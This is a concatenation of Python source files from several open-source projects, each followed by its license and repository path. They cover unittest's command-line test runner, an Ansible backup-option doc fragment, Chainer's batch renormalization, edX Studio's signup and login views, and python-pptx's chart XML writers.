self.defaultTest = defaultTest
self.testRunner = testRunner
self.testLoader = testLoader
self.progName = os.path.basename(argv[0])
self.parseArgs(argv)
self.runTests()
def usageExit(self, msg=None):
if msg:
print(msg)
usage = {'progName': self.progName, 'catchbreak': '', 'failfast': '',
'buffer': ''}
if self.failfast != False:
usage['failfast'] = FAILFAST
if self.catchbreak != False:
usage['catchbreak'] = CATCHBREAK
if self.buffer != False:
usage['buffer'] = BUFFEROUTPUT
print(self.USAGE % usage)
sys.exit(2)
def parseArgs(self, argv):
if ((len(argv) > 1 and argv[1].lower() == 'discover') or
(len(argv) == 1 and self.module is None)):
self._do_discovery(argv[2:])
return
parser = self._getOptParser()
options, args = parser.parse_args(argv[1:])
self._setAttributesFromOptions(options)
if len(args) == 0 and self.module is None:
# this allows "python -m unittest -v" to still work for
# test discovery. This means -c / -b / -v / -f options will
# be handled twice, which is harmless but not ideal.
self._do_discovery(argv[1:])
return
if len(args) == 0 and self.defaultTest is None:
# createTests will load tests from self.module
self.testNames = None
elif len(args) > 0:
self.testNames = _convert_names(args)
if __name__ == '__main__':
# to support python -m unittest ...
self.module = None
else:
self.testNames = (self.defaultTest,)
self.createTests()
def createTests(self):
if self.testNames is None:
self.test = self.testLoader.loadTestsFromModule(self.module)
else:
self.test = self.testLoader.loadTestsFromNames(self.testNames,
self.module)
def _getOptParser(self):
import optparse
parser = optparse.OptionParser()
parser.prog = self.progName
parser.add_option('-v', '--verbose', dest='verbose', default=False,
help='Verbose output', action='store_true')
parser.add_option('-q', '--quiet', dest='quiet', default=False,
help='Quiet output', action='store_true')
if self.failfast != False:
parser.add_option('-f', '--failfast', dest='failfast', default=False,
help='Stop on first fail or error',
action='store_true')
if self.catchbreak != False:
parser.add_option('-c', '--catch', dest='catchbreak', default=False,
help='Catch ctrl-C and display results so far',
action='store_true')
if self.buffer != False:
parser.add_option('-b', '--buffer', dest='buffer', default=False,
help='Buffer stdout and stderr during tests',
action='store_true')
return parser
def _setAttributesFromOptions(self, options):
# only set options from the parsing here
# if they weren't set explicitly in the constructor
if self.failfast is None:
self.failfast = options.failfast
if self.catchbreak is None:
self.catchbreak = options.catchbreak
if self.buffer is None:
self.buffer = options.buffer
if options.verbose:
self.verbosity = 2
elif options.quiet:
self.verbosity = 0
def _addDiscoveryOptions(self, parser):
parser.add_option('-s', '--start-directory', dest='start', default='.',
help="Directory to start discovery ('.' default)")
parser.add_option('-p', '--pattern', dest='pattern', default='test*.py',
help="Pattern to match tests ('test*.py' default)")
parser.add_option('-t', '--top-level-directory', dest='top', default=None,
help='Top level directory of project (defaults to start directory)')
def _do_discovery(self, argv, Loader=None):
if Loader is None:
Loader = lambda: self.testLoader
# handle command line args for test discovery
self.progName = '%s discover' % self.progName
parser = self._getOptParser()
self._addDiscoveryOptions(parser)
options, args = parser.parse_args(argv)
if len(args) > 3:
self.usageExit()
for name, value in zip(('start', 'pattern', 'top'), args):
setattr(options, name, value)
self._setAttributesFromOptions(options)
start_dir = options.start
pattern = options.pattern
top_level_dir = options.top
loader = Loader()
self.test = loader.discover(start_dir, pattern, top_level_dir)
def runTests(self):
if self.catchbreak:
installHandler()
if self.testRunner is None:
self.testRunner = runner.TextTestRunner
if isinstance(self.testRunner, type):
try:
testRunner = self.testRunner(verbosity=self.verbosity,
failfast=self.failfast,
buffer=self.buffer,
warnings=self.warnings)
except TypeError:
# didn't accept the verbosity, buffer or failfast arguments
testRunner = self.testRunner()
else:
# it is assumed to be a TestRunner instance
testRunner = self.testRunner
self.result = testRunner.run(self.test)
if self.exit:
sys.exit(not self.result.wasSuccessful())
main = TestProgram
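# --- Illustrative sketch, not part of the original module ---
# The USAGE strings above describe the two invocation modes. In shell terms
# (the argument values here are examples only):
#
#     python -m unittest test_module.TestClass.test_method -v
#     python -m unittest discover -s tests -p 'test*.py' -t .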
|
gpl-2.0
|
abtreece/ansible
|
lib/ansible/utils/module_docs_fragments/backup.py
|
427
|
1071
|
# Copyright (c) 2015 Ansible, Inc
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
class ModuleDocFragment(object):
# Standard documentation fragment
DOCUMENTATION = '''
options:
backup:
description:
- Create a backup file including the timestamp information so you can get
the original file back if you somehow clobbered it incorrectly.
required: false
choices: [ "yes", "no" ]
default: "no"
'''
|
mit
|
aonotas/chainer
|
chainer/functions/normalization/batch_renormalization.py
|
1
|
8651
|
import numpy
from chainer.backends import cuda
from chainer import configuration
from chainer import function
from chainer.utils import type_check
def _as4darray(arr):
if arr.ndim == 0:
return arr.reshape(1, 1, 1, 1)
elif arr.ndim == 4:
return arr
else:
return arr.reshape(arr.shape[0], -1, 1, 1)
def _xhat(x, mean, std, expander):
x_mu = x - mean[expander]
x_mu /= std[expander]
return x_mu
class BatchRenormalizationFunction(function.Function):
def __init__(self, eps=2e-5, mean=None, var=None, decay=0.9,
rmax=1, dmax=0, freeze_running_statistics=False):
self.running_mean = mean
self.running_var = var
self.rmax = rmax
self.dmax = dmax
self.r = None
self.d = None
self.freeze_running_statistics = freeze_running_statistics
self.eps = eps
self.mean_cache = None
self.decay = decay
def check_type_forward(self, in_types):
n_in = type_check.eval(in_types.size())
if n_in != 3 and n_in != 5:
raise type_check.InvalidType(
'%s or %s' % (in_types.size() == 3, in_types.size() == 5),
'%s == %s' % (in_types.size(), n_in))
x_type, gamma_type, beta_type = in_types[:3]
M = type_check.eval(gamma_type.ndim)
type_check.expect(
x_type.dtype.kind == 'f',
x_type.ndim >= gamma_type.ndim + 1,
x_type.shape[1:1 + M] == gamma_type.shape,
# TODO(tkerola): Check shape
gamma_type.dtype == x_type.dtype,
beta_type.dtype == x_type.dtype,
gamma_type.shape == beta_type.shape,
)
if len(in_types) == 5:
mean_type, var_type = in_types[3:]
type_check.expect(
mean_type.dtype == x_type.dtype,
mean_type.shape == gamma_type.shape,
var_type.dtype == x_type.dtype,
var_type.shape == gamma_type.shape,
)
def forward(self, inputs):
xp = cuda.get_array_module(*inputs)
x, gamma, beta = inputs[:3]
# Note: If length of inputs is not 5, we must be in train mode.
if len(inputs) != 5:
assert configuration.config.train
if configuration.config.train:
if self.running_mean is None:
self.running_mean = xp.zeros_like(gamma)
self.running_var = xp.zeros_like(gamma)
else:
self.running_mean = xp.array(self.running_mean)
self.running_var = xp.array(self.running_var)
elif len(inputs) == 5:
fixed_mean = inputs[3]
fixed_var = inputs[4]
head_ndim = gamma.ndim + 1
expander = (None, Ellipsis) + (None,) * (x.ndim - head_ndim)
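        # e.g. for 4-d x and 1-d gamma: head_ndim == 2 and
        # expander == (None, Ellipsis, None, None), so gamma[expander] has
        # shape (1, C, 1, 1) and broadcasts over the batch and spatial axes.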
# NOTE(tommi): cuDNN is not used since it does not support
# batch renormalization
if configuration.config.train:
axis = (0,) + tuple(range(head_ndim, x.ndim))
mean = x.mean(axis=axis)
var = x.var(axis=axis) + self.eps
else:
mean = fixed_mean
var = fixed_var + self.eps
self.std = xp.sqrt(var, dtype=var.dtype)
if not self.freeze_running_statistics or self.r is None:
if configuration.config.train:
running_sigma = xp.sqrt(self.running_var + self.eps,
dtype=self.running_mean.dtype)
self.r = xp.clip(self.std / running_sigma,
1.0 / self.rmax, self.rmax)
self.d = xp.clip((mean - self.running_mean) / running_sigma,
-self.dmax, self.dmax)
# Update running statistics:
m = x.size // gamma[expander].size
self.running_mean *= self.decay
adjust = m / max(m - 1., 1.) # unbiased estimation
temp_ar = xp.array(mean)
temp_ar *= (1 - self.decay)
self.running_mean += temp_ar
del temp_ar
self.running_var *= self.decay
temp_ar = xp.array(var)
temp_ar *= (1 - self.decay) * adjust
self.running_var += temp_ar
del temp_ar
else:
self.r = xp.ones_like(gamma)
self.d = xp.zeros_like(gamma)
if self.freeze_running_statistics:
# Need to explicitly cast during gradient check, as r and d are
# not updated during finite differences
self.r = self.r.astype(gamma.dtype)
self.d = self.d.astype(gamma.dtype)
gamma = gamma[expander]
beta = beta[expander]
if xp is numpy:
self.x_hat = _xhat(x, mean, self.std, expander)
self.x_hat_renorm = self.x_hat * self.r[expander] + \
self.d[expander]
y = gamma * self.x_hat_renorm
y += beta
else:
self.x_hat, self.x_hat_renorm, y = cuda.elementwise(
'T x, T mean, T std, T gamma, T beta, T r, T d',
'T x_hat, T x_hat_renorm, T y',
'''
x_hat = (x - mean) / std;
x_hat_renorm = x_hat * r + d;
y = gamma * x_hat_renorm + beta;
''',
'bn_fwd')(x, mean[expander], self.std[expander], gamma,
beta, self.r[expander], self.d[expander])
return y,
def backward(self, inputs, grad_outputs):
x, gamma = inputs[:2]
gy = grad_outputs[0]
head_ndim = gamma.ndim + 1
expander = (None, Ellipsis) + (None,) * (x.ndim - head_ndim)
m = gamma.dtype.type(x.size // gamma.size)
axis = (0,) + tuple(range(head_ndim, x.ndim))
xp = cuda.get_array_module(x)
if len(inputs) == 5:
# This case is unlikely to be used in practice and so does not
# need to be optimized for performance.
mean = inputs[3]
var = inputs[4] + self.eps
std = xp.sqrt(var, dtype=var.dtype)
gs = gamma / std
gbeta = gy.sum(axis=axis)
x_hat = _xhat(x, mean, std, expander)
ggamma = (gy * x_hat).sum(axis=axis)
gmean = -gs * gbeta
gvar = -0.5 * gamma / var * ggamma
gx = gs[expander] * gy
return gx, ggamma, gbeta, gmean, gvar
# Note: If length of inputs is not 5, we must be in train mode.
assert configuration.config.train
# NOTE(tommi): cuDNN is not used since it does not support
# batch renormalization
gbeta = gy.sum(axis=axis)
ggamma = (gy * self.x_hat_renorm).sum(axis=axis)
gsigma_batch = (gy * self.x_hat).sum(axis=axis)
if xp is numpy:
scale = (self.r * gamma / self.std)[expander]
gx = scale * (gy - (self.x_hat * gsigma_batch[expander] +
gbeta[expander]) / m)
else:
inv_m = numpy.float32(1) / m
gx = cuda.elementwise(
'T gy, T x_hat, T gamma, T std, T gsigma_batch, T gbeta, \
T inv_m, T r',
'T gx',
'gx = (r * gamma / std) * (gy - (x_hat * gsigma_batch + gbeta) * \
inv_m)',
'bn_bwd')(gy, self.x_hat, gamma[expander],
self.std[expander], gsigma_batch[expander],
gbeta[expander], inv_m, self.r[expander])
return gx, ggamma, gbeta
def batch_renormalization(x, gamma, beta, rmax, dmax, eps=2e-5,
running_mean=None, running_var=None, decay=0.9):
"""Batch renormalization function.
This is an extension of batch normalization, which ensures that the
training and inference models generate the same outputs that depend on
individual examples rather than the entire minibatch.
See: `Batch Renormalization: Towards Reducing Minibatch Dependence in \
Batch-Normalized Models <https://arxiv.org/abs/1702.03275>`_
.. seealso:: :class:`links.BatchRenormalization`
.. seealso:: :func:`functions.BatchNormalization`
"""
return BatchRenormalizationFunction(eps, running_mean, running_var,
decay, rmax, dmax)(x, gamma, beta)
def fixed_batch_renormalization(x, gamma, beta, mean, var, eps=2e-5):
with configuration.using_config('train', False):
return BatchRenormalizationFunction(eps, None, None, 0.0)(
x, gamma, beta, mean, var)
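# Illustrative usage sketch (an assumption, not part of the original module):
# the shapes, rmax/dmax values and the use of plain NumPy arrays below are
# arbitrary example choices; in train mode the running statistics are
# initialized and updated inside forward().
def _example_batch_renormalization():
    import numpy as np
    x = np.random.randn(8, 3, 4, 4).astype(np.float32)  # (batch, C, H, W)
    gamma = np.ones(3, dtype=np.float32)
    beta = np.zeros(3, dtype=np.float32)
    # rmax/dmax bound the correction factors r and d computed in forward().
    y = batch_renormalization(x, gamma, beta, rmax=3.0, dmax=5.0)
    return y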
|
mit
|
doganov/edx-platform
|
cms/djangoapps/contentstore/views/public.py
|
47
|
2383
|
"""
Public views
"""
from django.views.decorators.csrf import ensure_csrf_cookie
from django.views.decorators.clickjacking import xframe_options_deny
from django.core.context_processors import csrf
from django.core.urlresolvers import reverse
from django.shortcuts import redirect
from django.conf import settings
from edxmako.shortcuts import render_to_response
from external_auth.views import (ssl_login_shortcut, ssl_get_cert_from_request,
redirect_with_get)
from microsite_configuration import microsite
__all__ = ['signup', 'login_page', 'howitworks']
@ensure_csrf_cookie
@xframe_options_deny
def signup(request):
"""
Display the signup form.
"""
csrf_token = csrf(request)['csrf_token']
if request.user.is_authenticated():
return redirect('/course/')
if settings.FEATURES.get('AUTH_USE_CERTIFICATES_IMMEDIATE_SIGNUP'):
# Redirect to course to login to process their certificate if SSL is enabled
# and registration is disabled.
return redirect_with_get('login', request.GET, False)
return render_to_response('register.html', {'csrf': csrf_token})
@ssl_login_shortcut
@ensure_csrf_cookie
@xframe_options_deny
def login_page(request):
"""
Display the login form.
"""
csrf_token = csrf(request)['csrf_token']
if (settings.FEATURES['AUTH_USE_CERTIFICATES'] and
ssl_get_cert_from_request(request)):
# SSL login doesn't require a login view, so redirect
# to course now that the user is authenticated via
# the decorator.
next_url = request.GET.get('next')
if next_url:
return redirect(next_url)
else:
return redirect('/course/')
if settings.FEATURES.get('AUTH_USE_CAS'):
# If CAS is enabled, redirect auth handling to there
return redirect(reverse('cas-login'))
return render_to_response(
'login.html',
{
'csrf': csrf_token,
'forgot_password_link': "//{base}/login#forgot-password-modal".format(base=settings.LMS_BASE),
'platform_name': microsite.get_value('platform_name', settings.PLATFORM_NAME),
}
)
def howitworks(request):
"Proxy view"
if request.user.is_authenticated():
return redirect('/home/')
else:
return render_to_response('howitworks.html', {})
|
agpl-3.0
|
m3dev/pptx-template
|
.eggs/python_pptx-0.6.6-py2.7.egg/pptx/chart/xmlwriter.py
|
2
|
67454
|
# encoding: utf-8
"""
Composers for default chart XML for various chart types.
"""
from __future__ import absolute_import, print_function, unicode_literals
from copy import deepcopy
from xml.sax.saxutils import escape
from ..compat import to_unicode
from ..enum.chart import XL_CHART_TYPE
from ..oxml import parse_xml
from ..oxml.ns import nsdecls
def ChartXmlWriter(chart_type, chart_data):
"""
Factory function returning appropriate XML writer object for
*chart_type*, loaded with *chart_type* and *chart_data*.
"""
XL_CT = XL_CHART_TYPE
try:
BuilderCls = {
XL_CT.AREA: _AreaChartXmlWriter,
XL_CT.AREA_STACKED: _AreaChartXmlWriter,
XL_CT.AREA_STACKED_100: _AreaChartXmlWriter,
XL_CT.BAR_CLUSTERED: _BarChartXmlWriter,
XL_CT.BAR_STACKED: _BarChartXmlWriter,
XL_CT.BAR_STACKED_100: _BarChartXmlWriter,
XL_CT.BUBBLE: _BubbleChartXmlWriter,
XL_CT.BUBBLE_THREE_D_EFFECT: _BubbleChartXmlWriter,
XL_CT.COLUMN_CLUSTERED: _BarChartXmlWriter,
XL_CT.COLUMN_STACKED: _BarChartXmlWriter,
XL_CT.COLUMN_STACKED_100: _BarChartXmlWriter,
XL_CT.DOUGHNUT: _DoughnutChartXmlWriter,
XL_CT.DOUGHNUT_EXPLODED: _DoughnutChartXmlWriter,
XL_CT.LINE: _LineChartXmlWriter,
XL_CT.LINE_MARKERS: _LineChartXmlWriter,
XL_CT.LINE_MARKERS_STACKED: _LineChartXmlWriter,
XL_CT.LINE_MARKERS_STACKED_100: _LineChartXmlWriter,
XL_CT.LINE_STACKED: _LineChartXmlWriter,
XL_CT.LINE_STACKED_100: _LineChartXmlWriter,
XL_CT.PIE: _PieChartXmlWriter,
XL_CT.PIE_EXPLODED: _PieChartXmlWriter,
XL_CT.RADAR: _RadarChartXmlWriter,
XL_CT.RADAR_FILLED: _RadarChartXmlWriter,
XL_CT.RADAR_MARKERS: _RadarChartXmlWriter,
XL_CT.XY_SCATTER: _XyChartXmlWriter,
XL_CT.XY_SCATTER_LINES: _XyChartXmlWriter,
XL_CT.XY_SCATTER_LINES_NO_MARKERS: _XyChartXmlWriter,
XL_CT.XY_SCATTER_SMOOTH: _XyChartXmlWriter,
XL_CT.XY_SCATTER_SMOOTH_NO_MARKERS: _XyChartXmlWriter,
}[chart_type]
except KeyError:
raise NotImplementedError(
'XML writer for chart type %s not yet implemented' % chart_type
)
return BuilderCls(chart_type, chart_data)
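# Illustrative sketch (an assumption, not part of the original module): how the
# factory above might be driven from chart data. CategoryChartData and its
# categories/add_series() API are assumed to come from pptx.chart.data; the
# category names and series values are arbitrary example data.
def _example_chart_xml():
    from pptx.chart.data import CategoryChartData
    chart_data = CategoryChartData()
    chart_data.categories = ['East', 'West']
    chart_data.add_series('Sales', (19.2, 21.4))
    writer = ChartXmlWriter(XL_CHART_TYPE.BAR_CLUSTERED, chart_data)
    return writer.xml  # complete <c:chartSpace> document as unicode text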
def SeriesXmlRewriterFactory(chart_type, chart_data):
"""
Return a |_BaseSeriesXmlRewriter| subclass appropriate to *chart_type*.
"""
XL_CT = XL_CHART_TYPE
RewriterCls = {
        # There are 73 distinct chart types; only the non-category types are
        # listed here, all others default to _CategorySeriesXmlRewriter.
        # Stock-type charts are multi-plot charts, so there are no guarantees
        # on how they turn out.
XL_CT.BUBBLE: _BubbleSeriesXmlRewriter,
XL_CT.BUBBLE_THREE_D_EFFECT: _BubbleSeriesXmlRewriter,
XL_CT.XY_SCATTER: _XySeriesXmlRewriter,
XL_CT.XY_SCATTER_LINES: _XySeriesXmlRewriter,
XL_CT.XY_SCATTER_LINES_NO_MARKERS: _XySeriesXmlRewriter,
XL_CT.XY_SCATTER_SMOOTH: _XySeriesXmlRewriter,
XL_CT.XY_SCATTER_SMOOTH_NO_MARKERS: _XySeriesXmlRewriter,
}.get(chart_type, _CategorySeriesXmlRewriter)
return RewriterCls(chart_data)
class _BaseChartXmlWriter(object):
"""
Generates XML text (unicode) for a default chart, like the one added by
PowerPoint when you click the *Add Column Chart* button on the ribbon.
Differentiated XML for different chart types is provided by subclasses.
"""
def __init__(self, chart_type, series_seq):
super(_BaseChartXmlWriter, self).__init__()
self._chart_type = chart_type
self._chart_data = series_seq
self._series_seq = list(series_seq)
@property
def xml(self):
"""
The full XML stream for the chart specified by this chart builder, as
unicode text. This method must be overridden by each subclass.
"""
raise NotImplementedError('must be implemented by all subclasses')
class _BaseSeriesXmlWriter(object):
"""
Provides shared members for series XML writers.
"""
def __init__(self, series, date_1904=False):
super(_BaseSeriesXmlWriter, self).__init__()
self._series = series
self._date_1904 = date_1904
@property
def name(self):
"""
The XML-escaped name for this series.
"""
return escape(self._series.name)
def numRef_xml(self, wksht_ref, number_format, values):
"""
Return the ``<c:numRef>`` element specified by the parameters as
unicode text.
"""
pt_xml = self.pt_xml(values)
return (
' <c:numRef>\n'
' <c:f>{wksht_ref}</c:f>\n'
' <c:numCache>\n'
' <c:formatCode>{number_format}</c:formatCode>\n'
'{pt_xml}'
' </c:numCache>\n'
' </c:numRef>\n'
).format(**{
'wksht_ref': wksht_ref,
'number_format': number_format,
'pt_xml': pt_xml,
})
def pt_xml(self, values):
"""
Return the ``<c:ptCount>`` and sequence of ``<c:pt>`` elements
corresponding to *values* as a single unicode text string.
        `c:ptCount` gives the number of data points in *values*; points whose
        value is None are omitted from the ``<c:pt>`` sequence. The `idx`
        attribute of each ``<c:pt>`` element is the data point's position
        within *values*.
"""
xml = (
' <c:ptCount val="{pt_count}"/>\n'
).format(
pt_count=len(values)
)
pt_tmpl = (
' <c:pt idx="{idx}">\n'
' <c:v>{value}</c:v>\n'
' </c:pt>\n'
)
for idx, value in enumerate(values):
if value is None:
continue
xml += pt_tmpl.format(idx=idx, value=value)
return xml
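    # For example, pt_xml([1.2, None, 3.4]) yields a ptCount of 3 with points
    # at idx 0 and 2 only; the None value is skipped rather than written as an
    # empty <c:pt> element (an illustration derived from the code above).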
@property
def tx(self):
"""
Return a ``<c:tx>`` oxml element for this series, containing the
series name.
"""
xml = self._tx_tmpl.format(**{
'wksht_ref': self._series.name_ref,
'series_name': self.name,
'nsdecls': ' %s' % nsdecls('c'),
})
return parse_xml(xml)
@property
def tx_xml(self):
"""
Return the ``<c:tx>`` (tx is short for 'text') element for this
series as unicode text. This element contains the series name.
"""
return self._tx_tmpl.format(**{
'wksht_ref': self._series.name_ref,
'series_name': self.name,
'nsdecls': '',
})
@property
def _tx_tmpl(self):
"""
The string formatting template for the ``<c:tx>`` element for this
series, containing the series title and spreadsheet range reference.
"""
return (
' <c:tx{nsdecls}>\n'
' <c:strRef>\n'
' <c:f>{wksht_ref}</c:f>\n'
' <c:strCache>\n'
' <c:ptCount val="1"/>\n'
' <c:pt idx="0">\n'
' <c:v>{series_name}</c:v>\n'
' </c:pt>\n'
' </c:strCache>\n'
' </c:strRef>\n'
' </c:tx>\n'
)
class _BaseSeriesXmlRewriter(object):
"""
Base class for series XML rewriters.
"""
def __init__(self, chart_data):
super(_BaseSeriesXmlRewriter, self).__init__()
self._chart_data = chart_data
def replace_series_data(self, chartSpace):
"""
Rewrite the series data under *chartSpace* using the chart data
contents. All series-level formatting is left undisturbed. If
the chart data contains fewer series than *chartSpace*, the extra
series in *chartSpace* are deleted. If *chart_data* contains more
series than the *chartSpace* element, new series are added to the
last plot in the chart and series formatting is "cloned" from the
last series in that plot.
"""
plotArea, date_1904 = chartSpace.plotArea, chartSpace.date_1904
chart_data = self._chart_data
self._adjust_ser_count(plotArea, len(chart_data))
for ser, series_data in zip(plotArea.sers, chart_data):
self._rewrite_ser_data(ser, series_data, date_1904)
def _add_cloned_sers(self, plotArea, count):
"""
Add `c:ser` elements to the last xChart element in *plotArea*, cloned
from the last `c:ser` child of that last xChart.
"""
def clone_ser(ser):
new_ser = deepcopy(ser)
new_ser.idx.val = plotArea.next_idx
new_ser.order.val = plotArea.next_order
ser.addnext(new_ser)
return new_ser
last_ser = plotArea.last_ser
for _ in range(count):
last_ser = clone_ser(last_ser)
def _adjust_ser_count(self, plotArea, new_ser_count):
"""
Adjust the number of c:ser elements in *plotArea* to *new_ser_count*.
Excess c:ser elements are deleted from the end, along with any xChart
elements that are left empty as a result. Series elements are
considered in xChart + series order. Any new c:ser elements required
are added to the last xChart element and cloned from the last c:ser
element in that xChart.
"""
ser_count_diff = new_ser_count - len(plotArea.sers)
if ser_count_diff > 0:
self._add_cloned_sers(plotArea, ser_count_diff)
elif ser_count_diff < 0:
self._trim_ser_count_by(plotArea, abs(ser_count_diff))
def _rewrite_ser_data(self, ser, series_data, date_1904):
"""
Rewrite selected child elements of *ser* based on the values in
*series_data*.
"""
raise NotImplementedError('must be implemented by each subclass')
def _trim_ser_count_by(self, plotArea, count):
"""
Remove the last *count* ser elements from *plotArea*. Any xChart
elements having no ser child elements after trimming are also
removed.
"""
extra_sers = plotArea.sers[-count:]
for ser in extra_sers:
parent = ser.getparent()
parent.remove(ser)
extra_xCharts = [
xChart for xChart in plotArea.iter_xCharts()
if len(xChart.sers) == 0
]
for xChart in extra_xCharts:
parent = xChart.getparent()
parent.remove(xChart)
class _AreaChartXmlWriter(_BaseChartXmlWriter):
"""
Provides specialized methods particular to the ``<c:areaChart>`` element.
"""
@property
def xml(self):
return (
'<?xml version=\'1.0\' encoding=\'UTF-8\' standalone=\'yes\'?>\n'
'<c:chartSpace xmlns:c="http://schemas.openxmlformats.org/drawin'
'gml/2006/chart" xmlns:a="http://schemas.openxmlformats.org/draw'
'ingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/off'
'iceDocument/2006/relationships">\n'
' <c:date1904 val="0"/>\n'
' <c:roundedCorners val="0"/>\n'
' <c:chart>\n'
' <c:autoTitleDeleted val="0"/>\n'
' <c:plotArea>\n'
' <c:layout/>\n'
' <c:areaChart>\n'
'{grouping_xml}'
' <c:varyColors val="0"/>\n'
'{ser_xml}'
' <c:dLbls>\n'
' <c:showLegendKey val="0"/>\n'
' <c:showVal val="0"/>\n'
' <c:showCatName val="0"/>\n'
' <c:showSerName val="0"/>\n'
' <c:showPercent val="0"/>\n'
' <c:showBubbleSize val="0"/>\n'
' </c:dLbls>\n'
' <c:axId val="-2101159928"/>\n'
' <c:axId val="-2100718248"/>\n'
' </c:areaChart>\n'
'{cat_ax_xml}'
' <c:valAx>\n'
' <c:axId val="-2100718248"/>\n'
' <c:scaling>\n'
' <c:orientation val="minMax"/>\n'
' </c:scaling>\n'
' <c:delete val="0"/>\n'
' <c:axPos val="l"/>\n'
' <c:majorGridlines/>\n'
' <c:numFmt formatCode="General" sourceLinked="1"/>\n'
' <c:majorTickMark val="out"/>\n'
' <c:minorTickMark val="none"/>\n'
' <c:tickLblPos val="nextTo"/>\n'
' <c:crossAx val="-2101159928"/>\n'
' <c:crosses val="autoZero"/>\n'
' <c:crossBetween val="midCat"/>\n'
' </c:valAx>\n'
' </c:plotArea>\n'
' <c:legend>\n'
' <c:legendPos val="r"/>\n'
' <c:layout/>\n'
' <c:overlay val="0"/>\n'
' </c:legend>\n'
' <c:plotVisOnly val="1"/>\n'
' <c:dispBlanksAs val="zero"/>\n'
' <c:showDLblsOverMax val="0"/>\n'
' </c:chart>\n'
' <c:txPr>\n'
' <a:bodyPr/>\n'
' <a:lstStyle/>\n'
' <a:p>\n'
' <a:pPr>\n'
' <a:defRPr sz="1800"/>\n'
' </a:pPr>\n'
' <a:endParaRPr/>\n'
' </a:p>\n'
' </c:txPr>\n'
'</c:chartSpace>\n'
).format(**{
'grouping_xml': self._grouping_xml,
'ser_xml': self._ser_xml,
'cat_ax_xml': self._cat_ax_xml,
})
@property
def _cat_ax_xml(self):
categories = self._chart_data.categories
if categories.are_dates:
return (
' <c:dateAx>\n'
' <c:axId val="-2101159928"/>\n'
' <c:scaling>\n'
' <c:orientation val="minMax"/>\n'
' </c:scaling>\n'
' <c:delete val="0"/>\n'
' <c:axPos val="b"/>\n'
' <c:numFmt formatCode="{nf}" sourceLinked="1"/>\n'
' <c:majorTickMark val="out"/>\n'
' <c:minorTickMark val="none"/>\n'
' <c:tickLblPos val="nextTo"/>\n'
' <c:crossAx val="-2100718248"/>\n'
' <c:crosses val="autoZero"/>\n'
' <c:auto val="1"/>\n'
' <c:lblOffset val="100"/>\n'
' <c:baseTimeUnit val="days"/>\n'
' </c:dateAx>\n'
).format(**{
'nf': categories.number_format,
})
return (
' <c:catAx>\n'
' <c:axId val="-2101159928"/>\n'
' <c:scaling>\n'
' <c:orientation val="minMax"/>\n'
' </c:scaling>\n'
' <c:delete val="0"/>\n'
' <c:axPos val="b"/>\n'
' <c:numFmt formatCode="General" sourceLinked="1"/>\n'
' <c:majorTickMark val="out"/>\n'
' <c:minorTickMark val="none"/>\n'
' <c:tickLblPos val="nextTo"/>\n'
' <c:crossAx val="-2100718248"/>\n'
' <c:crosses val="autoZero"/>\n'
' <c:auto val="1"/>\n'
' <c:lblAlgn val="ctr"/>\n'
' <c:lblOffset val="100"/>\n'
' <c:noMultiLvlLbl val="0"/>\n'
' </c:catAx>\n'
)
@property
def _grouping_xml(self):
val = {
XL_CHART_TYPE.AREA: 'standard',
XL_CHART_TYPE.AREA_STACKED: 'stacked',
XL_CHART_TYPE.AREA_STACKED_100: 'percentStacked',
}[self._chart_type]
return ' <c:grouping val="%s"/>\n' % val
@property
def _ser_xml(self):
xml = ''
for series in self._chart_data:
xml_writer = _CategorySeriesXmlWriter(series)
xml += (
' <c:ser>\n'
' <c:idx val="{ser_idx}"/>\n'
' <c:order val="{ser_order}"/>\n'
'{tx_xml}'
'{cat_xml}'
'{val_xml}'
' </c:ser>\n'
).format(**{
'ser_idx': series.index,
'ser_order': series.index,
'tx_xml': xml_writer.tx_xml,
'cat_xml': xml_writer.cat_xml,
'val_xml': xml_writer.val_xml,
})
return xml
class _BarChartXmlWriter(_BaseChartXmlWriter):
"""
Provides specialized methods particular to the ``<c:barChart>`` element.
"""
@property
def xml(self):
return (
'<?xml version=\'1.0\' encoding=\'UTF-8\' standalone=\'yes\'?>\n'
'<c:chartSpace xmlns:c="http://schemas.openxmlformats.org/drawin'
'gml/2006/chart" xmlns:a="http://schemas.openxmlformats.org/draw'
'ingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/off'
'iceDocument/2006/relationships">\n'
' <c:date1904 val="0"/>\n'
' <c:chart>\n'
' <c:plotArea>\n'
' <c:barChart>\n'
'{barDir_xml}'
'{grouping_xml}'
'{ser_xml}'
'{overlap_xml}'
' <c:axId val="-2068027336"/>\n'
' <c:axId val="-2113994440"/>\n'
' </c:barChart>\n'
'{cat_ax_xml}'
' <c:valAx>\n'
' <c:axId val="-2113994440"/>\n'
' <c:scaling/>\n'
' <c:delete val="0"/>\n'
' <c:axPos val="{val_ax_pos}"/>\n'
' <c:majorGridlines/>\n'
' <c:majorTickMark val="out"/>\n'
' <c:minorTickMark val="none"/>\n'
' <c:tickLblPos val="nextTo"/>\n'
' <c:crossAx val="-2068027336"/>\n'
' <c:crosses val="autoZero"/>\n'
' </c:valAx>\n'
' </c:plotArea>\n'
' <c:dispBlanksAs val="gap"/>\n'
' </c:chart>\n'
' <c:txPr>\n'
' <a:bodyPr/>\n'
' <a:lstStyle/>\n'
' <a:p>\n'
' <a:pPr>\n'
' <a:defRPr sz="1800"/>\n'
' </a:pPr>\n'
' <a:endParaRPr lang="en-US"/>\n'
' </a:p>\n'
' </c:txPr>\n'
'</c:chartSpace>\n'
).format(**{
'barDir_xml': self._barDir_xml,
'grouping_xml': self._grouping_xml,
'ser_xml': self._ser_xml,
'overlap_xml': self._overlap_xml,
'cat_ax_xml': self._cat_ax_xml,
'val_ax_pos': self._val_ax_pos,
})
@property
def _barDir_xml(self):
XL = XL_CHART_TYPE
bar_types = (
XL.BAR_CLUSTERED, XL.BAR_STACKED, XL.BAR_STACKED_100
)
col_types = (
XL.COLUMN_CLUSTERED, XL.COLUMN_STACKED, XL.COLUMN_STACKED_100
)
if self._chart_type in bar_types:
return ' <c:barDir val="bar"/>\n'
elif self._chart_type in col_types:
